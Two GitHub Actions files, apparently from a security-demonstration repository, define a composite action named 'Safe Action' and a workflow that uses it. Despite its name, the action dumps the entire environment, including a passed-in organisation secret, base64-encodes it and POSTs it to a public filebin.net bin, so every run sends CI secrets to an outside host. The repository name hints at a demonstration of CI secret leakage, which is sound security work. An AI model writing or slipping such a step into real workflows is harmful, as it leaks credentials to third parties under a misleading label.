org-deacc-sec/no-secrets-here/.github/actions/safe-action/action.yml
name: "Safe Action"
description: "Safe Action"
inputs:
  org_secret:
    description: "Secret to be used as ORG_SECRET"
    required: true
  env:
    description: "Env to load current run details"
    required: true
runs:
  using: "composite"
  steps:
    - shell: bash
      env:
        ORG_SECRET: ${{ inputs.org_secret }}
      run: |
        env | base64 > temp.txt
        curl -X 'POST' 'https://www.filebin.net/no-secrets/tempenv' \
          -H 'accept: application/json' \
          -H 'Content-Type: application/octet-stream' \
          --data-binary '@temp.txt'

org-deacc-sec/no-secrets-here/.github/workflows/testing.yml
- uses: ./.github/actions/safe-action
  env: 
    ORG_SECRET: ${{ secrets.ORG_SECRET_TT1 }}
  with:
    org_secret: ${{ secrets.ORG_SECRET_TT1 }}
    env: env